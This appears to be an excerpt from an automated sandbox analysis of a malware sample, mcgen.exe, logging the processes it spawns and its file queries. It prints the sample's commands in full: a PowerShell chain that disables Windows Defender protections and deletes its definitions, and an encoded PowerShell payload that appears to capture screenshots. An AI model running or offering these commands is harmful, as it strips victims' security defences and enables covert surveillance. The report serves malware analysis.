jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe

Code function: 103_2_00007FF695D1B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

103_2_00007FF695D1B340

Source: C:\Users\user\Desktop\mcgen.exe

Code function: 0_2_00007FF6B9F395E0 cpuid

0_2_00007FF6B9F395E0

Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI32122\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\mcgen.exe	Queries volume information: C:\Users\user\Desktop\mcgen.exe VolumeInformation	Jump to behavior
